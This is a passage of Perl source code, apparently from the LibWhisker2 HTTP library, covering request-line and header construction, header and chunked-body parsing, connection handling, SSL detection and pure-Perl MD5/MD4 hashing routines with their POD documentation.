$$W{'ssl'} > 0 && $LW_SSL_KEEPALIVE == 0 );\n        $stream->{'close'}->() if ($cl);\n    }\n\n    if ( defined $$W{'header_delete_on_success'}\n        && ref( $$W{'header_delete_on_success'} ) )\n    {\n        foreach ( @{ $$W{'header_delete_on_success'} } ) {\n            delete $hin->{$_} if ( exists $hin->{$_} );\n        }\n        delete $$W{header_delete_on_success};\n    }\n\n    $stream->{reqs}++;\n    $$hout{whisker}->{'stats_reqs'}   = $stream->{reqs};\n    $$hout{whisker}->{'stats_syns'}   = $stream->{syns};\n    $$hout{whisker}->{'socket_state'} = $stream->{state};\n    delete $$hout{whisker}->{'error'};    # no error\n    return 0;\n\n}\n\n##################################################################\n\n=item B<http_req2line>\n\nParams: \\%request, $uri_only_switch\n\nReturn: $request\n\nreq2line is used internally by http_do_request, as well as provides a\nconvenient way to turn a %request configuration into an actual HTTP request\nline.  If $switch is set to 1, then the returned $request will be the URI\nonly ('/requested/page.html'), versus the entire HTTP request ('GET\n/requested/page.html HTTP/1.0\\n\\n').  Also, if the 'full_request_override'\nwhisker config variable is set in %hin, then it will be returned instead\nof the constructed URI.\n\n=cut\n\nsub http_req2line {\n    my ( $S, $hin, $UO ) = ( '', @_ );\n    $UO ||= 0;\n\n    # notice: full_request_override can play havoc with proxy settings\n    if ( defined $$hin{whisker}->{'full_request_override'} ) {\n        return $$hin{whisker}->{'full_request_override'};\n\n    }\n    else {    # notice the components of a request--this is for flexibility\n        if ( $UO != 1 ) {\n            $S .= $$hin{whisker}->{'method'} . $$hin{whisker}->{'http_space1'};\n            if ( $$hin{whisker}->{'include_host_in_uri'} > 0 ) {\n                if ( $$hin{whisker}->{'ssl'} == 1 ) {\n                    $S .= 'https://';\n                }\n                else {\n                    $S .= 'http://';\n                }\n\n                if ( defined $$hin{whisker}->{'uri_user'} ) {\n                    $S .= $$hin{whisker}->{'uri_user'};\n                    if ( defined $$hin{whisker}->{'uri_password'} ) {\n                        $S .= ':' . $$hin{whisker}->{'uri_password'};\n                    }\n                    $S .= '@';\n                }\n\n                $S .= $$hin{whisker}->{'host'} . ':' . $$hin{whisker}->{'port'};\n            }\n        }\n\n        $S .=\n            $$hin{whisker}->{'uri_prefix'}\n          . $$hin{whisker}->{'uri'}\n          . $$hin{whisker}->{'uri_postfix'};\n\n        if ( defined $$hin{whisker}->{'parameters'}\n            && $$hin{whisker}->{'parameters'} ne '' )\n        {\n            $S .=\n                $$hin{whisker}->{'uri_param_sep'}\n              . $$hin{whisker}->{'parameters'};\n        }\n\n        if ( $UO != 1 ) {\n            if ( $$hin{whisker}->{'version'} ne '0.9' ) {\n                $S .=\n                    $$hin{whisker}->{'http_space2'}\n                  . $$hin{whisker}->{'protocol'} . '/'\n                  . $$hin{whisker}->{'version'};\n            }\n            $S .= $$hin{whisker}->{'http_eol'};\n        }\n    }\n    return $S;\n}\n\n##################################################################\n\n=item B<http_resp2line>\n\nParams: \\%response\n\nReturn: $response\n\nhttp_resp2line provides a convenient way to turn a %response hash back\ninto the original HTTP response line.\n\n=cut\n\nsub http_resp2line {\n    my $hout = shift;\n    my $out  = '';\n    return undef if ( !defined $hout || !ref($hout) );\n    return undef if ( $hout->{whisker}->{MAGIC} != 31340 );\n    $out .= $$hout{whisker}->{protocol};\n    $out .= '/';\n    $out .= $$hout{whisker}->{version};\n    $out .= $$hout{whisker}->{http_space1};\n    $out .= $$hout{whisker}->{code};\n    $out .= $$hout{whisker}->{http_space2};\n    $out .= $$hout{whisker}->{message};\n    $out .= $$hout{whisker}->{http_eol};\n    return $out;\n}\n\n##################################################################\n\nsub _http_getline {\n    my $stream = shift;\n    my ( $str, $t, $bc ) = ( '', 0, 0 );\n\n    $t = index( $stream->{bufin}, \"\\n\", 0 );\n    while ( $t < 0 ) {\n        return undef if !$stream->{read}->() ||\n\t\tlength($stream->{bufin}) == $bc;\n        $t = index( $stream->{bufin}, \"\\n\", 0 );\n        $bc = length( $stream->{bufin} );\n    }\n\n    my $r = substr( $stream->{bufin}, 0, $t + 1 );\n    $stream->{bufin} = substr( $stream->{bufin}, $t + 1 );\n\n    #\tsubstr($stream->{bufin},0,$t+1)='';\n    return $r;\n}\n\n##################################################################\n\nsub _http_get {    # read from socket w/ timeouts\n    my ( $stream, $amount ) = @_;\n    my ( $str, $t, $b )     = ( '', '', 0 );\n\n    while ( $amount > length( $stream->{bufin} ) ) {\n        return undef if !$stream->{read}->() ||\n\t\tlength( $stream->{bufin} ) == $b;\n\t$b = length( $stream->{bufin} );\n    }\n\n    my $r = substr( $stream->{bufin}, 0, $amount );\n    $stream->{bufin} = substr( $stream->{bufin}, $amount );\n\n    #\tsubstr($stream->{bufin},0,$amount)='';\n    return $r;\n}\n\n##################################################################\n\nsub _http_getall {\n    my ( $tmp, $b, $stream, $max_size ) = ('', 0, @_);\n\n    while ( $stream->{read}->() && length( $stream->{bufin} ) != $b) {\n        last if ( $max_size && length( $stream->{bufin} ) >= $max_size );\n        $b = length( $stream->{bufin} );\n    }\n    ( $tmp, $stream->{bufin} ) = ( $stream->{bufin}, '' );\n    $tmp = substr($tmp, 0, $max_size) if($max_size &&\n    \tlength($tmp) > $max_size);\n    return $tmp;\n}\n\n##################################################################\n\n=item B<http_fixup_request>\n\nParams: $hash_ref\n\nReturn: Nothing\n\nThis function takes a %hin hash reference and makes sure the proper\nheaders exist (for example, it will add the Host: header, calculate the\nContent-Length: header for POST requests, etc).  For standard requests\n(i.e. you want the request to be HTTP RFC-compliant), you should call this\nfunction right before you call http_do_request.\n\n=cut\n\nsub http_fixup_request {\n    my $hin = shift;\n\n    return if ( !( defined $hin && ref($hin) ) );\n\n    $$hin{whisker}->{uri} = '/' if ( $$hin{whisker}->{uri} eq '' );\n    $$hin{whisker}->{http_space1}= ' ';\n    $$hin{whisker}->{http_space2}= ' ';\n    $$hin{whisker}->{protocol}= 'HTTP';\n    $$hin{whisker}->{uri_param_sep}= '?';\n\n    if ( $$hin{whisker}->{'version'} eq '1.1' ) {\n        my ($host) = utils_find_lowercase_key($hin,'host');\n        $$hin{'Host'} = $$hin{whisker}->{'host'}\n            if(!defined $host || $host eq '');\n        $$hin{'Host'} .= ':' . $$hin{whisker}->{'port'}\n          if ( index($$hin{'Host'},':') == -1 &&\n               ( $$hin{whisker}->{port} != 80 && ( $$hin{whisker}->{ssl}==1 &&\n              $$hin{whisker}->{port} != 443 ) ) );\n        my ($conn) = utils_find_lowercase_key($hin,'connection');\n        $$hin{'Connection'} = 'Keep-Alive'\n            if(!defined $conn || $conn eq '');\n\n    } elsif( $$hin{whisker}->{'version'} eq '1.0' ){\n        my ($conn) = utils_find_lowercase_key($hin,'connection');\n        $$hin{'Connection'} = 'close'\n            if(!defined $conn || $conn eq '');\n    }\n\n    utils_delete_lowercase_key( $hin, 'content-length' );\n    if ( $$hin{whisker}->{method} eq 'POST' ||\n    \t\tdefined $$hin{whisker}->{data} ) {\n\t$$hin{whisker}->{data}||='';\n        $$hin{'Content-Length'} = length( $$hin{whisker}->{'data'} );\n        my ($v) = utils_find_lowercase_key( $hin, 'content-type' );\n        if ( !defined $v || $v eq '' ) {\n            $$hin{'Content-Type'} = 'application/x-www-form-urlencoded';\n        }\n    }\n\n    #if(defined $$hin{whisker}->{'proxy_host'} && $$hin{whisker}->{ssl}==0){\n    if ( defined $$hin{whisker}->{'proxy_host'} ) {\n        $$hin{whisker}->{'include_host_in_uri'} = 1;\n    }\n\n}\n\n##################################################################\n\n=item B<http_reset>\n\nParams: Nothing\n\nReturn: Nothing\n\nThe http_reset function will walk through the %http_host_cache,\nclosing all open sockets and freeing SSL resources.  It also clears\nout the host cache in case you need to rerun everything fresh.\n\nNote: if you just want to close a single connection, and you have\na copy of the %request hash you used, you should use the http_close()\nfunction instead.\n\n=cut\n\nsub http_reset {\n    my $stream;\n\n    foreach $stream ( keys %http_host_cache ) {\n        $stream->{'close'}->() if(ref($stream));\n        delete $http_host_cache{$stream};\n    }\n}\n\n##################################################################\n\n=item B<ssl_is_available>\n\nParams: Nothing\n\nReturn: $boolean [, $lib_name, $version]\n\nThe ssl_is_available() function will inform you whether SSL requests\nare allowed, which is dependent on whether the appropriate SSL\nlibraries are installed on the machine.  In scalar context, the\nfunction will return 1 or 0.  In array context, the second element\nwill be the SSL library name that is currently being used by LW2,\nand the third element will be the SSL library version number.\nElements two and three (name and version) will be undefined if\ncalled in array context and no SSL libraries are available.\n\n=cut\n\nsub ssl_is_available {\n    return 0 if ( $LW_SSL_LIB == 0 );\n    if ( $LW_SSL_LIB == 1 ) {\n        return 1 if ( !wantarray() );\n        return ( 1, \"Net::SSLeay\", $Net::SSLeay::VERSION );\n    }\n    elsif ( $LW_SSL_LIB == 2 ) {\n        return 1 if ( !wantarray() );\n        return ( 1, \"Net::SSL\", $Net::SSL::VERSION );\n    }\n    else {\n        utils_carp('',\"ssl_is_available: sanity check failed\");\n        return 0;\n    }\n}\n\n##################################################################\n\nsub _ssl_save_info {\n    my ( $hr, $stream ) = @_;\n    my $cert;\n\n    if ( $stream->{streamtype} == 4 ) {\n        my $SSL = $stream->{sock};\n        $hr->{whisker}->{ssl_cipher} = Net::SSLeay::get_cipher($SSL);\n        if ( $cert = Net::SSLeay::get_peer_certificate($SSL) ) {\n            $hr->{whisker}->{ssl_cert_subject} =\n              Net::SSLeay::X509_NAME_oneline(\n                Net::SSLeay::X509_get_subject_name($cert) );\n            $hr->{whisker}->{ssl_cert_issuer} =\n              Net::SSLeay::X509_NAME_oneline(\n                Net::SSLeay::X509_get_issuer_name($cert) );\n            $hr->{whisker}->{ssl_cert_altnames} =\n              [ Net::SSLeay::X509_get_subjectAltNames($cert) ];\n        }\n        return;\n    }\n\n    if ( $stream->{streamtype} == 5 ) {\n        $hr->{whisker}->{ssl_cipher} = $stream->{sock}->get_cipher();\n        if ( $cert = $stream->{sock}->get_peer_certificate() ) {\n            $hr->{whisker}->{ssl_cert_subject} = $cert->subject_name();\n            $hr->{whisker}->{ssl_cert_issuer}  = $cert->issuer_name();\n        }\n        return;\n    }\n}\n\n##################################################################\n\n=item B<http_read_headers>\n\nParams: $stream, \\%in, \\%out\n\nReturn: $result_code, $encoding, $length, $connection\n\nRead HTTP headers from the given stream, storing the results in %out.  On\nsuccess, $result_code will be 1 and $encoding, $length, and $connection\nwill hold the values of the Transfer-Encoding, Content-Length, and\nConnection headers, respectively.  If any of those headers are not present,\nthen it will have an 'undef' value.  On an error, the $result_code will\nbe 0 and $encoding will contain an error message.\n\nThis function can be used to parse both request and response headers.\n\nNote: if there are multiple Transfer-Encoding, Content-Length, or\nConnection headers, then only the last header value is the one returned\nby the function.\n\n=cut\n\nsub http_read_headers {\n    my ( $stream, $in, $hout ) = @_;\n    my $W = $in->{whisker};\n    my ( $a, $b, $LC, $CL, $TE, $CO );\n\n    # we use direct access into the stream buffers for quickest\n    # parsing of the headers\n    my $last;\n    pos( $stream->{bufin} ) = 0;\n    while (1) {\n        $last = pos( $stream->{bufin} );\n        if ( $stream->{bufin} !~ m/(.*?)[\\r]{0,1}\\n/g ) {\n            if ( !$stream->{read}->() ) {\n                last\n                  if ( $$W{require_newline_after_headers} == 0\n                    && length( $stream->{bufin} ) - 1 == $last );\n                return ( 0, 'error reading in all headers' );\n            }\n            pos( $stream->{bufin} ) = $last;\n            next;\n        }\n        last if ( $1 eq '' );\n\n        # should we *not* puke on malformed header?\n        return ( 0, 'malformed header' )\n          if ( $1 !~ m/^([^:]+):([ \\t]*)(.*)$/ );\n\n        $$hout{whisker}->{'abnormal_header_spacing'}++ if ( $2 ne ' ' );\n\n        $a  = $1;\n        $b  = $3;\n        $LC = lc($a);\n        next if ( $LC eq 'whisker' );\n        $TE = lc($b) if ( $LC eq 'transfer-encoding' );\n        $CL = $b     if ( $LC eq 'content-length' );\n        $CO = lc($b) if ( $LC eq 'connection' );\n        push( @{ $$hout{whisker}->{cookies} }, $b )\n          if ( $LC eq 'set-cookie' || $LC eq 'set-cookie2' );\n\n        if ( $$W{'lowercase_incoming_headers'} > 0 ) {\n            $a = $LC;\n        }\n        elsif ( $$W{'normalize_incoming_headers'} > 0 ) {\n            $a = ucfirst($LC);\n            $a = 'ETag' if ( $a eq 'Etag' );\n            $a =~ s/(-[a-z])/uc($1)/eg;\n        }\n\n        push( @{ $$hout{whisker}->{header_order} }, $a );\n\n        if ( defined $$hout{$a} && $$W{ignore_duplicate_headers} != 1 ) {\n            $$hout{$a} = [ $$hout{$a} ] if ( !ref( $$hout{$a} ) );\n            push( @{ $$hout{$a} }, $b );\n        }\n        else {\n            $$hout{$a} = $b;\n        }\n    }\n\n    my $found = pos( $stream->{bufin} );\n    $$hout{whisker}->{'raw_header_data'} = substr( $stream->{bufin}, 0, $found )\n      if ( defined $$W{'save_raw_headers'} );\n    $stream->{bufin} = substr( $stream->{bufin}, $found );\n    return ( 1, $TE, $CL, $CO );\n}\n\n##################################################################\n\n=item B<http_read_body>\n\nParams: $stream, \\%in, \\%out, $encoding, $length\n\nReturn: 1 on success, 0 on error (and sets $hout->{whisker}->{error})\n\nRead the body from the given stream, placing it in $out->{whisker}->{data}.\nHandles chunked encoding.  Can be used to read HTTP (POST) request or HTTP\nresponse bodies.  $encoding parameter should be lowercase encoding type.\n\nNOTE: $out->{whisker}->{data} is erased/cleared when this function is called,\nleaving {data} to just contain this particular HTTP body.\n\n=cut\n\nsub http_read_body {\n    my ( $temp, $stream, $hin, $hout, $enc, $len ) = ( '', @_ );\n    my $max_size = $hin->{whisker}->{max_size} || 0;\n    $$hout{whisker}->{data} = '';\n\n    if ( defined $enc && lc($enc) eq 'chunked' ) {\n        my $total = 0;\n        my $x;\n        my $saveraw = $$hin{whisker}->{save_raw_chunks} || 0;\n        if ( !defined( $x = _http_getline($stream) ) ) {\n            $$hout{whisker}->{'error'} = 'Error reading chunked data length';\n            $stream->{'close'}->();\n            return 0;\n        }\n        $a = $x;\n        $a =~ tr/a-fA-F0-9//cd;\n        if ( length($a) > 8 ) {\n            $$hout{whisker}->{'error'} = 'Chunked size is too big: ' . $x;\n            $stream->{'close'}->();\n            return 0;\n        }\n        $len = hex($a);\n        $len = $max_size if ( $max_size && $len > $max_size );\n\n        $$hout{whisker}->{'data'} = $x if ($saveraw);\n\n        while ( $len > 0 ) {    # chunked sucks\n            if ( !defined( $temp = _http_get( $stream, $len ) ) ) {\n                $$hout{whisker}->{'error'} = 'Error reading chunked data';\n                $stream->{'close'}->();\n                return 0;\n            }\n            $$hout{whisker}->{'data'} = $$hout{whisker}->{'data'} . $temp;\n            $total += $len;\n            if ( $max_size && $total >= $max_size ) {\n                $stream->{'close'}->();\n                return 1;\n            }\n            $temp = _http_getline($stream);\n            $$hout{whisker}->{'data'} .= $temp if ( $saveraw && defined $temp );\n            if ( defined $temp && $temp =~ /^[\\r\\n]*$/ ) {\n                $temp = _http_getline($stream);\n                $$hout{whisker}->{'data'} .= $temp\n                  if ( $saveraw && defined $temp );\n            }\n            if ( !defined $temp ) {\n                $$hout{whisker}->{'error'} = 'Error reading chunked data';\n                $stream->{'close'}->();\n                return 0;\n            }\n            $temp =~ tr/a-fA-F0-9//cd;\n            if ( length($temp) > 8 ) {\n                $$hout{whisker}->{'error'} =\n                  'Chunked size is too big: ' . $temp;\n                $stream->{'close'}->();\n                return 0;\n            }\n            $len = hex($temp);\n            $len = ( $max_size - $total )\n              if ( $max_size && $len > ( $max_size - $total ) );\n        }\n\n        # read in trailer headers; currently doesn't account for max_size\n        while ( defined( $_ = _http_getline($stream) ) ) {\n            $$hout{whisker}->{'data'} .= $_ if ($saveraw);\n            tr/\\r\\n//d;\n            last if ( $_ eq '' );\n        }\n\n    }\n    else {\n        if ( defined $len ) {\n            return 1 if ( $len <= 0 );\n            $len = $max_size if ( $max_size && $len > $max_size );\n            if (\n                !defined(\n                    $$hout{whisker}->{data} = _http_get( $stream, $len )\n                )\n              )\n            {\n                $stream->{'close'}->();\n\n\t\t\t\t\t\t\t\t# New LW2.5 feature: allow_short_reads will still return\n\t\t\t\t\t\t\t\t# success, even if all the data wasn't read.  This was\n\t\t\t\t\t\t\t\t# per request due to some 3Com switches sending out\n\t\t\t\t\t\t\t\t# the wrong content-length in HTTP response\n\t\t\t\t\t\t\t\tmy $s = $$hin{whisker}->{allow_short_reads} || 0;\n\t\t\t\t\t\t\t\tif ( $s != 0 && length($stream->{'bufin'}) > 0 ) {\n\t\t\t\t\t\t\t\t\t# short read is requested, and there is some data, so\n\t\t\t\t\t\t\t\t\t# copy it over and return a non-error\n\t\t\t\t\t\t\t\t\t$$hout{whisker}->{'data'} = $stream->{'bufin'};\n\t\t\t\t\t\t\t\t\treturn 1;\n\t\t\t\t\t\t\t\t}\n\n                $$hout{whisker}->{'error'} =\n                  'Error reading data: ' . $stream->{error};\n                return 0;\n            }\n        }\n        else {    # Yuck...read until server stops sending....\n            $$hout{whisker}->{data} = _http_getall( $stream, $max_size );\n            $stream->{'close'}->();\n        }\n        $$hout{whisker}->{'data'} ||= '';\n    }\n    return 1;\n}\n\n##################################################################\n\n=item B<http_construct_headers>\n\nParams: \\%in\n\nReturn: $data\n\nThis function assembles the headers in the given hash into a data\nstring.\n\n=cut\n\nsub http_construct_headers {\n    my $hin = shift;\n    my ( %SENT, $output, $i );\n\n    my $EOL = $hin->{whisker}->{http_eol} || \"\\x0d\\x0a\";\n    if ( defined $hin->{whisker}->{header_order}\n        && ref( $hin->{whisker}->{header_order} ) eq 'ARRAY' )\n    {\n        foreach ( @{ $hin->{whisker}->{header_order} } ) {\n            next if ( $_ eq '' || $_ eq 'whisker' || !defined $hin->{$_} );\n            if ( ref( $hin->{$_} ) ) {\n                utils_croak(\"http_construct_headers: non-array header value reference\")\n                  if ( ref( $hin->{$_} ) ne 'ARRAY' );\n                $SENT{$_} ||= 0;\n                my $v = $$hin{$_}->[ $SENT{$_} ];\n                $output .= \"$_: $v$EOL\";\n            }\n            else {\n                $output .= \"$_: $$hin{$_}$EOL\";\n            }\n            $SENT{$_}++;\n        }\n    }\n\n    foreach ( keys %$hin ) {\n        next if ( $_ eq '' || $_ eq 'whisker' );\n        if ( ref( $hin->{$_} ) ) {    # header with multiple values\n\t    utils_croak(\"http_construct_headers: non-array header value ref\")\n\t    \tif ( ref( $hin->{$_} ) ne 'ARRAY' );\n\t    $SENT{$_} ||= 0;\n\t    for($i=$SENT{$_}; $i<~~@{ $hin->{$_} }; $i++) {\n                $output .= \"$_: \" . $hin->{$_}->[$i] . $EOL;\n            }\n        }\n        else {                       # normal header\n            next if ( defined $SENT{$_} );\n            $output .= \"$_: $$hin{$_}$EOL\";\n        }\n    }\n    return $output;\n}\n\n##################################################################\n\n=item B<http_close>\n\nParams: \\%request\n\nReturn: nothing\n\nThis function will close any open streams for the given request.\n\nNote: in order for http_close() to find the right connection, all\noriginal host/proxy/port parameters in %request must be the exact\nsame as when the original request was made.\n\n=cut\n\nsub http_close {\n    my $hin       = shift;\n    my $cache_key = stream_key($hin);\n    return if ( !defined $http_host_cache{$cache_key} );\n    my $stream = $http_host_cache{$cache_key};\n    $stream->{'close'}->();\n}\n\n##################################################################\n\n=item B<http_do_request_timeout>\n\nParams: \\%request, \\%response, $timeout\n\nReturn: $result\n\nThis function is identical to http_do_request(), except that it\nwraps the entire request in a timeout wrapper.  $timeout is the\nnumber of seconds to allow for the entire request to be completed.\n\nNote: this function uses alarm() and signals, and thus will only\nwork on Unix-ish platforms.  It should be safe to call on any\nplatform though.\n\n=cut\n\nsub http_do_request_timeout {\n    my ( $req, $resp, $timeout ) = @_;\n    $timeout ||= 30;\n\n    my $result;\n    eval {\n        local $SIG{ALRM} = sub { die \"timeout\\n\" };\n        eval { alarm($timeout) };\n        $result = LW2::http_do_request( $req, $resp );\n        eval { alarm(0) };\n    };\n    if ($@) {\n        $result                   = 1;\n        $resp->{whisker}->{error} = 'Error with timeout wrapper';\n        $resp->{whisker}->{error} = 'Total transaction timed out'\n          if ( $@ =~ /timeout/ );\n    }\n    return $result;\n}\n\n\n########################################################################\n\n{    # start md5 packaged varbs\n    my ( @S, @T, @M );\n    my $code           = '';\n    my $MD5_TRYLOADING = 1;\n\n=item B<md5>\n\nParams: $data\n\nReturn: $hex_md5_string\n\nThis function takes a data scalar, and composes a MD5 hash of it, and\nreturns it in a hex ascii string.  It will use the fastest MD5 function\navailable.\n\n=cut\n\n    sub md5 {\n        return undef if ( !defined $_[0] );    # oops, forgot the data\n        if ($MD5_TRYLOADING) {\n            $MD5_TRYLOADING = 0;\n            eval \"require MD5\";\n        }\n        return MD5->hexhash( $_[0] ) if ($MD5::VERSION);\n        my $DATA = _md5_pad( $_[0] );\n        &_md5_init() if ( !defined $M[0] );\n        return _md5_perl_generated( \\$DATA );\n    }\n\n########################################################################\n\n    sub _md5_init {\n        return if ( defined $S[0] );\n        my $i;\n        for ( $i = 1 ; $i <= 64 ; $i++ ) {\n            $T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );\n        }\n        my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );\n        for ( $i = 0 ; $i < 64 ; $i++ ) {\n            $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];\n        }\n        @M = (\n            0, 1, 2,  3,  4,  5,  6,  7,  8,  9,  10, 11, 12, 13, 14, 15,\n            1, 6, 11, 0,  5,  10, 15, 4,  9,  14, 3,  8,  13, 2,  7,  12,\n            5, 8, 11, 14, 1,  4,  7,  10, 13, 0,  3,  6,  9,  12, 15, 2,\n            0, 7, 14, 5,  12, 3,  10, 1,  8,  15, 6,  13, 4,  11, 2,  9\n        );\n        &_md5_generate();\n\n        # check to see if it works correctly\n        my $TEST = _md5_pad('foobar');\n        if ( _md5_perl_generated( \\$TEST ) ne\n            '3858f62230ac3c915f300c664312c63f' )\n        {\n            utils_carp('md5: MD5 self-test not successful.');\n        }\n    }\n\n########################################################################\n\n    # This function is from Digest::Perl::MD5, and bears the following\n    # copyrights:\n    #\n    # Copyright 2000 Christian Lackas, Imperia Software Solutions\n    # Copyright 1998-1999 Gisle Aas.\n    # Copyright 1995-1996 Neil Winton.\n    # Copyright 1991-1992 RSA Data Security, Inc.\n    #\n\n    sub _md5_pad {\n        my $l = length( my $msg = shift() . chr(128) );\n        $msg .= \"\\0\" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );\n        $l = ( $l - 1 ) * 8;\n        $msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 );\n        return $msg;\n    }\n\n########################################################################\n\n    sub _md5_generate {\n        my $N = 'abcddabccdabbcda';\n        my ( $i, $M ) = ( 0, '' );\n        $M = '&0xffffffff' if ( ( 1 << 16 ) << 16 );    # mask for 64bit systems\n\n        $code = <<EOT;\n        sub _md5_perl_generated {\n\tBEGIN { \\$^H |= 1; }; # use integer\n        my (\\$A,\\$B,\\$C,\\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);\n        my (\\$a,\\$b,\\$c,\\$d,\\$t,\\$i);\n        my \\$dr=shift;\n        my \\$l=length(\\$\\$dr);\n        for my \\$L (0 .. ((\\$l/64)-1) ) {\n                my \\@D = unpack('V16', substr(\\$\\$dr, \\$L*64,64));\n                (\\$a,\\$b,\\$c,\\$d)=(\\$A,\\$B,\\$C,\\$D);\nEOT\n\n        for ( $i = 0 ; $i < 16 ; $i++ ) {\n            my ( $a, $b, $c, $d ) =\n              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );\n            $code .=\n              \"\\$t=((\\$$d^(\\$$b\\&(\\$$c^\\$$d)))+\\$$a+\\$D[$M[$i]]+$T[$i])$M;\\n\";\n            $code .=\n\"\\$$a=(((\\$t<<$S[$i])|((\\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\\$$b)$M;\\n\";\n        }\n        for ( ; $i < 32 ; $i++ ) {\n            my ( $a, $b, $c, $d ) =\n              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );\n            $code .=\n              \"\\$t=((\\$$c^(\\$$d\\&(\\$$b^\\$$c)))+\\$$a+\\$D[$M[$i]]+$T[$i])$M;\\n\";\n            $code .=\n\"\\$$a=(((\\$t<<$S[$i])|((\\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\\$$b)$M;\\n\";\n        }\n        for ( ; $i < 48 ; $i++ ) {\n            my ( $a, $b, $c, $d ) =\n              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );\n            $code .= \"\\$t=((\\$$b^\\$$c^\\$$d)+\\$$a+\\$D[$M[$i]]+$T[$i])$M;\\n\";\n            $code .=\n\"\\$$a=(((\\$t<<$S[$i])|((\\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\\$$b)$M;\\n\";\n        }\n        for ( ; $i < 64 ; $i++ ) {\n            my ( $a, $b, $c, $d ) =\n              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );\n            $code .= \"\\$t=((\\$$c^(\\$$b|(~\\$$d)))+\\$$a+\\$D[$M[$i]]+$T[$i])$M;\\n\";\n            $code .=\n\"\\$$a=(((\\$t<<$S[$i])|((\\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\\$$b)$M;\\n\";\n        }\n\n        $code .= <<EOT;\n                \\$A=\\$A+\\$a\\&0xffffffff; \\$B=\\$B+\\$b\\&0xffffffff;\n                \\$C=\\$C+\\$c\\&0xffffffff; \\$D=\\$D+\\$d\\&0xffffffff;\n        } # for\n\treturn unpack('H*', pack('V4',\\$A,\\$B,\\$C,\\$D)); }\nEOT\n        eval \"$code\";\n    }\n\n}    # md5 package container\n\n########################################################################\n\n{    # start md4 packaged varbs\n    my ( @S, @T, @M );\n    my $code = '';\n\n=item B<md4>\n\nParams: $data\n\nReturn: $hex_md4_string\n\nThis function takes a data scalar, and composes a MD4 hash of it, and\nreturns it in a hex ascii string.  It will use the fastest MD4 function\navailable.\n\n=cut\n\n    sub md4 {\n        return undef if ( !defined $_[0] );    # oops, forgot the data\n        my $DATA = _md5_pad( $_[0] );\n        &_md4_init() if ( !defined $M[0] );\n        return _md4_perl_generated( \\$DATA );\n    }\n\n########################################################################\n\n    sub _md4_init {\n        return if ( defined $S[0] );\n        my $i;\n        my @t = ( 3, 7, 11, 19, 3, 5, 9, 13, 3, 9, 11, 15 );\n        for ( $i = 0 ; $i < 48 ; $i++ ) {\n            $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];\n        }\n        @M = (\n            0, 1, 2, 3,  4, 5,  6, 7,  8, 9, 10, 11, 12, 13, 14, 15,\n            0, 4, 8, 12, 1, 5,  9, 13, 2, 6, 10, 14, 3,  7,  11, 15,\n            0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5,  13, 3,  11, 7,  15\n        );\n\n        my $N = 'abcddabccdabbcda';\n        my $M = '';\n        $M = '&0xffffffff' if ( ( 1 << 16 ) << 16 );    # mask for 64bit systems\n\n        $code = <<EOT;\n        sub _md4_perl_generated {\n\tBEGIN { \\$^H |= 1; }; # use integer\n        my (\\$A,\\$B,\\$C,\\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);\n        my (\\$a,\\$b,\\$c,\\$d,\\$t,\\$i);\n        my \\$dr=shift;\n        my \\$l=length(\\$\\$dr);\n        for my \\$L (0 .. ((\\$l/64)-1) ) {\n                my \\@D = unpack('V16', substr(\\$\\$dr, \\$L*64,64));\n                (\\$a,\\$b,\\$c,\\$d)=(\\$A,\\$B,\\$C,\\$D);\nEOT\n\n        for ( $i = 0 ; $i < 16 ; $i++ ) {\n            my ( $a, $b, $c, $d ) =\n              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );\n            $code .= \"\\$t=((\\$$d^(\\$$b\\&(\\$$c^\\$$d)))+\\$$a+\\$D[$M[$i]])$M;\\n\";\n            $code .=\n\"\\$$a=(((\\$t<<$S[$i])|((\\$t>>(32-$S[$i]))&((1<<$S[$i])-1))))$M;\\n\";\n        }\n        for ( ; $i < 32 ; $i++ ) {\n            my ( $a, $b, $c, $d ) =\n              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );\n            $code .=\n\"\\$t=(( (\\$$b&\\$$c)|(\\$$b&\\$$d)|(\\$$c&\\$$d) )+\\$$a+\\$D[$M[$i]]+0x5a827999)$M;\\n\";\n            $code .=\n\"\\$$a=(((\\$t<<$S[$i])|((\\$t>>(32-$S[$i]))&((1<<$S[$i])-1))))$M;\\n\";\n        }\n        for ( ; $i < 48 ; $i++ ) {\n            my ( $a, $b, $c, $d ) =\n              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );\n            $code .=\n              \"\\$t=(( \\$$b^\\$$c^\\$$d )+\\$$a+\\$D[$M[$i]]+0x6ed9eba1)$M;\\n\";\n            $code .=\n\"\\$$a=(((\\$t<<$S[$i])|((\\$t>>(32-$S[$i]))&((1<<$S[$i])-1))))$M;\\n\";\n        }\n\n        $code .= <<EOT;\n                \\$A=\\$A+\\$a\\&0xffffffff; \\$B=\\$B+\\$b\\&0xffffffff;\n                \\$C=\\$C+\\$c\\&0xffffffff; \\$D=\\$D+\\$d\\&0xffffffff;\n        } # for\n\treturn unpack('H*', pack('V4',\\$A,\\$B,\\$C,\\$D)); }\nEOT\n        eval \"$code\";\n\n        my $TEST = _md5_pad('foobar');\n        if ( _md4_perl_generated( \\$TEST ) ne\n            '547aefd231dcbaac398625718336f143' )\n        {\n            utils_carp('md4: MD4 self-test not successful.');\n        }\n    }\n\n}    # md4 package container\n\n\n########################################################################\n\n=item B<multipart_set>\n\nParams: \\%multi_hash, $param_name, $param_value\n\nReturn: nothing\n\nThis function sets the named parameter to the given value within the\nsupplied multipart hash.\n\n=cut\n\nsub multipart_set {\n    my ( $hr, $n, $v ) 